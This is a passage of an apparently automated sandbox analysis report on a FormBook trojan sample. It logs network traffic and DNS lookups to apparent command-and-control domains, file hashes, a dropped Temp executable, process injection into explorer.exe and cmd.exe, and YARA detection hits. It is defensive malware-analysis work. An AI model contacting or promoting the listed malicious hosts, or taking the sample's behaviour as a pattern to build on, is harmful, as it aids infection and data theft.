                                                                    Mar 20, 2023 16:59:46.439450979 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.439614058 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.476691008 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:51.479353905 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:51.508332968 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.510864019 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:51.510987997 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:51.538568974 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.538933992 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.539037943 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.539123058 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:53.025367975 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.043806076 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.071490049 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.071722031 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.072148085 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.099571943 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.099611998 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.099633932 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.099822998 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.100164890 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.127706051 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:59.126749039 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 16:59:59.153734922 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.153947115 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 16:59:59.154143095 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 16:59:59.181529999 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.182496071 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.182528019 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.182634115 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:00.666766882 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.683223009 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.707376957 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.707633018 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.707849026 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.731712103 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.732481956 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.732547998 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.732713938 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.732954979 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.756808043 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:06.786604881 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:06.806010008 CET804970191.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:06.807351112 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:06.807351112 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:06.827474117 CET804970191.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:06.827512026 CET804970191.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:06.832981110 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:08.308280945 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.324009895 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.343242884 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.343389988 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.343542099 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.394530058 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394562960 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394582987 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394602060 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394620895 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394639969 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394659042 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394673109 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394748926 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394779921 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.394840002 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394848108 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.394885063 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.413861036 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413888931 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413908958 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413927078 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413945913 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413964033 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413973093 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.413983107 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.414005041 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.414017916 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.414125919 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.414351940 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.433420897 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:15.521128893 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.542534113 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.542710066 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.542984962 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.564192057 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750376940 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750427961 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750452995 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750571012 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.758713961 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.758759975 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.758881092 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:17.061141014 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:18.075567007 CET4970480192.168.2.4213.145.228.111

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 20, 2023 16:59:46.136440992 CET5657253192.168.2.48.8.8.8
                                                                    Mar 20, 2023 16:59:46.156369925 CET53565728.8.8.8192.168.2.4
                                                                    Mar 20, 2023 16:59:51.451244116 CET5091153192.168.2.48.8.8.8
                                                                    Mar 20, 2023 16:59:51.474733114 CET53509118.8.8.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.107836008 CET5968353192.168.2.48.8.8.8
                                                                    Mar 20, 2023 16:59:59.125689983 CET53596838.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:06.763504028 CET6416753192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:06.785231113 CET53641678.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:15.491092920 CET5856553192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:15.519546032 CET53585658.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:23.355577946 CET5223953192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:23.388257980 CET53522398.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:31.040029049 CET5680753192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:31.183070898 CET53568078.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:39.271570921 CET6100753192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:39.320899963 CET53610078.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:47.549798012 CET6068653192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:47.680247068 CET53606868.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:56.317701101 CET6112453192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:56.368645906 CET53611248.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:57.380626917 CET5944453192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:57.408945084 CET53594448.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:01:02.477611065 CET5557053192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:01:02.627077103 CET53555708.8.8.8192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Mar 20, 2023 16:59:46.136440992 CET192.168.2.48.8.8.80x7d04Standard query (0)www.white-hat.ukA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:51.451244116 CET192.168.2.48.8.8.80xcb57Standard query (0)www.gritslab.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:59.107836008 CET192.168.2.48.8.8.80x9da5Standard query (0)www.bitservicesltd.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:06.763504028 CET192.168.2.48.8.8.80xf43cStandard query (0)www.222ambking.orgA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:15.491092920 CET192.168.2.48.8.8.80x4b72Standard query (0)www.energyservicestation.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:23.355577946 CET192.168.2.48.8.8.80xe0bcStandard query (0)www.younrock.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.040029049 CET192.168.2.48.8.8.80x5edbStandard query (0)www.thewildphotographer.co.ukA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:39.271570921 CET192.168.2.48.8.8.80x317eStandard query (0)www.shapshit.xyzA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:47.549798012 CET192.168.2.48.8.8.80x692bStandard query (0)www.thedivinerudraksha.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:56.317701101 CET192.168.2.48.8.8.80x95e7Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:57.380626917 CET192.168.2.48.8.8.80x29b0Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:01:02.477611065 CET192.168.2.48.8.8.80xbf61Standard query (0)www.un-object.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Mar 20, 2023 16:59:46.156369925 CET8.8.8.8192.168.2.40x7d04No error (0)www.white-hat.ukwhite-hat.ukCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:46.156369925 CET8.8.8.8192.168.2.40x7d04No error (0)white-hat.uk94.176.104.86A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:51.474733114 CET8.8.8.8192.168.2.40xcb57No error (0)www.gritslab.comgritslab.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:51.474733114 CET8.8.8.8192.168.2.40xcb57No error (0)gritslab.com78.141.192.145A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:59.125689983 CET8.8.8.8192.168.2.40x9da5No error (0)www.bitservicesltd.com161.97.163.8A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:06.785231113 CET8.8.8.8192.168.2.40xf43cNo error (0)www.222ambking.org91.195.240.94A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:15.519546032 CET8.8.8.8192.168.2.40x4b72No error (0)www.energyservicestation.com213.145.228.111A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:23.388257980 CET8.8.8.8192.168.2.40xe0bcNo error (0)www.younrock.com81.17.18.198A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.30.197A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.79.19.196A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.56.79.23A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.20.235A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk72.14.178.174A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk198.58.118.167A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk96.126.123.244A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk72.14.185.43A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.2.79A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk173.255.194.134A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.18.44A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.23.183A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:39.320899963 CET8.8.8.8192.168.2.40x317eNo error (0)www.shapshit.xyz199.192.30.147A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:47.680247068 CET8.8.8.8192.168.2.40x692bNo error (0)www.thedivinerudraksha.comthedivinerudraksha.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:47.680247068 CET8.8.8.8192.168.2.40x692bNo error (0)thedivinerudraksha.com85.187.128.34A (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:56.368645906 CET8.8.8.8192.168.2.40x95e7Name error (3)www.fclaimrewardccpointq.shopnonenoneA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:57.408945084 CET8.8.8.8192.168.2.40x29b0Name error (3)www.fclaimrewardccpointq.shopnonenoneA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:01:02.627077103 CET8.8.8.8192.168.2.40xbf61No error (0)www.un-object.comun-object.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 20, 2023 17:01:02.627077103 CET8.8.8.8192.168.2.40xbf61No error (0)un-object.com192.185.17.12A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.white-hat.uk
                                                                    • www.gritslab.com
                                                                    • www.bitservicesltd.com
                                                                    • www.222ambking.org
                                                                    • www.energyservicestation.com
                                                                    • www.younrock.com
                                                                    • www.thewildphotographer.co.uk
                                                                    • www.shapshit.xyz
                                                                    • www.thedivinerudraksha.com
                                                                    • www.un-object.com

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:16:59:05
                                                                    Start date:20/03/2023
                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    Imagebase:0x400000
                                                                    File size:299717 bytes
                                                                    MD5 hash:C7714B273571BA64C0B77AFCA236AC6D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:1
                                                                    Start time:16:59:05
                                                                    Start date:20/03/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
                                                                    Imagebase:0x400000
                                                                    File size:95232 bytes
                                                                    MD5 hash:6D30D26416D626447BA4298A59111F6D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 39%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:2
                                                                    Start time:16:59:05
                                                                    Start date:20/03/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7c72c0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:3
                                                                    Start time:16:59:06
                                                                    Start date:20/03/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                    Imagebase:0x400000
                                                                    File size:95232 bytes
                                                                    MD5 hash:6D30D26416D626447BA4298A59111F6D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:4
                                                                    Start time:16:59:12
                                                                    Start date:20/03/2023
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff618f60000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:5
                                                                    Start time:16:59:25
                                                                    Start date:20/03/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                    Imagebase:0xd90000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    Reputation:high

                                                                    Disassembly

                                                                    No disassembly